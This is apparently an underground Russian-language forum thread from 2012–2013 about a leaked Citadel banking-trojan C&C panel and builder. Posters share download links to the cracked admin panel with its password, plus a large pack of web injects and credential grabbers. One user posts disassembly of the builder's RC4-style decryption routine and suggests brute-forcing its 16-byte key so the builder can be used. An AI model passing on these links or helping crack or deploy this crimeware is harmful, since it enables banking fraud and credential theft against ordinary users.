Citadel 1.3.4.5 C&C & Builder

demien · 21.10.2012

Билдер привязан к vmware , требуется отвязка от железа.

ну так выложили бы весь образ вмвари...

Apocalypse · 21.10.2012

+1 к образу и будет отвязан билдер

greenzy · 22.10.2012

да вроде норм воркает. только с exe'шником создаваемым проблема

никакого vmprotect'a :fuck:

greenzy · 22.10.2012

http://www.sendspace.com/file/c40aej часть админки

Aels · 22.10.2012

дубль. код не влез

Aels · 22.10.2012

Если такая пьянка...
http://www.opensc.ws/attachments/cracked-m...tadel-panel.zip
панель, Password: CL-security
Ревью панели:
http://foro.cl-security.net/botnet/citadel-1-3-4-5/
А теперь вкусняшки...
Пак инжей. Хуева туча свежих граберов, авторов на эксплойте искать лень.
http://pastebin.com/s34p8CgM
~5000 строк.
Видео-модуль.

http://www.sendspace.com/file/opwopv

Снял с админки, которую ксилитол постил у себя в твитере.

stork · 23.10.2012

спасибо, я искал его

У меня много сообщений и не видят пароля

demien · 23.10.2012

и какой результат ? )

в банере снизу справа появилось cracked by ApoX =)

stork · 24.10.2012

> FenX

Я не вижу пароля, вы можете PM

WHBmen · 28.10.2012

линк на рабочий билдер выложите плиз)

greenzy · 28.10.2012

товарищи! ломаного билдера не будет :punk:

salamandra · 02.11.2012

как это!поясни.Либо прпоцедуры шифруются!Вм там нет

Avox · 02.11.2012

salamandra
Думаю, просто за спасибо никто не отдаст.

CepbIu · 03.11.2012

как это!поясни.Либо прпоцедуры шифруются!Вм там нет

там не билдер

P.S. opensc разве опять заработал?

Ragnar · 03.11.2012

господа, прекратите нести х#йню

там билдер, внутри него реализован rc4 или его модификация, для расшифровки требуется
ключ в 16 байт, можно пробрутить впринципе, но надо рипнуть алгос и написать брутер
407161 - процесс расшифровки исходного файла пользуясь ключом.
eax-память
ebx-размер образа
arg1-ключ (16 байт)

Код:

0040710A  |.  BF 00380300   MOV EDI,33800
0040710F  |.  59            POP ECX
00407110  |.  8BC7          MOV EAX,EDI
00407112  |.  E8 96ABFFFF   CALL Dumped_.xalloc                     ; [Dumped_.xalloc
00407117  |.  8BF0          MOV ESI,EAX
00407119  |.  85F6          TEST ESI,ESI
0040711B  |.^ 0F84 1BFCFFFF JE Dumped_.00406D3C
00407121  |.  6A 01         PUSH 1                                  ; /Arg1 = 1
00407123  |.  E8 83F6FFFF   CALL Dumped_.watchablethread            ; Dumped_.watchablethread
00407128  |.  803D A8C24A00 CMP BYTE PTR DS:[Dumped_.4AC2A8],0
0040712F  |.  75 1B         JNE SHORT Dumped_.0040714C
00407131  |.  33C9          XOR ECX,ECX
00407133  |.  E8 16AAFFFF   CALL Dumped_.00401B4E
00407138  |.  50            PUSH EAX
00407139  |.  53            PUSH EBX
0040713A  |.  E8 C1AAFFFF   CALL Dumped_.00401C00
0040713F  |.  59            POP ECX
00407140  |.  59            POP ECX
00407141  |.  56            PUSH ESI                                ; /Arg1
00407142  |.  E8 8DABFFFF   CALL Dumped_.xfree                      ; \Dumped_.xfree
00407147  |.  E9 DD020000   JMP Dumped_.00407429
0040714C  |>  57            PUSH EDI                                ; /Arg3
0040714D  |.  68 18E34000   PUSH Dumped_.0040E318                   ; |Arg2 = Dumped_.40E318
00407152  |.  56            PUSH ESI                                ; |Arg1
00407153  |.  E8 B8ABFFFF   CALL Dumped_.memcpy                     ; \Dumped_.memcpy
00407158  |.  68 70C24A00   PUSH Dumped_.004AC270                   ; /Arg1 = Dumped_.4AC270
0040715D  |.  8BDF          MOV EBX,EDI                             ; |
0040715F  |.  8BC6          MOV EAX,ESI                             ; |
00407161  |.  E8 43CFFFFF   CALL Dumped_.004040A9                   ; \Dumped_.004040A9
00407166  |.  56            PUSH ESI                                ; /Arg2
00407167  |.  8D85 34FFFFFF LEA EAX,[LOCAL.51]                      ; |
0040716D  |.  50            PUSH EAX                                ; |Arg1 => OFFSET LOCAL.51
0040716E  |.  E8 A4D5FFFF   CALL Dumped_.00404717                   ; \Dumped_.00404717
00407173  |.  56            PUSH ESI                                ; /Arg1
00407174  |.  85C0          TEST EAX,EAX                            ; |
00407176  |.  75 0C         JNE SHORT Dumped_.00407184              ; |
00407178  |.  E8 57ABFFFF   CALL Dumped_.xfree                      ; \Dumped_.xfree
0040717D  |>  6A 33         PUSH 33
0040717F  |.  E9 94020000   JMP Dumped_.00407418
00407184  |>  E8 4BABFFFF   CALL Dumped_.xfree                      ; \Dumped_.xfree

кому интересно пишите брутер, насилуйте свою машину

Ragnar · 14.11.2012

16 байт передается в качестве ключа, как оно формируется раньше неважно
можно пропатчить при желании на перебор всех ключей и рано или поздно прокатит. но у меня нет на то времени

bresti · 21.12.2012

this shitt dnt work

demien · 21.12.2012

this shitt dnt work

what actually dnt work?
here is part of disasm of builder, where at 407161 are placed process of decryption

bresti · 23.02.2013

have someone this builder?

Citadel 1.3.4.5 C&C & Builder

demien

(L2) cache

Apocalypse

CPU register

greenzy

(L3) cache

greenzy

(L3) cache

Aels

(L3) cache

Aels

(L3) cache

stork

CD-диск

demien

(L2) cache

stork

CD-диск

WHBmen

CD-диск

greenzy

(L3) cache

salamandra

(L3) cache

Avox

HDD-drive

CepbIu

HDD-drive

Ragnar

RAID-массив

Ragnar

RAID-массив

bresti

floppy-диск

demien

(L2) cache

bresti

floppy-диск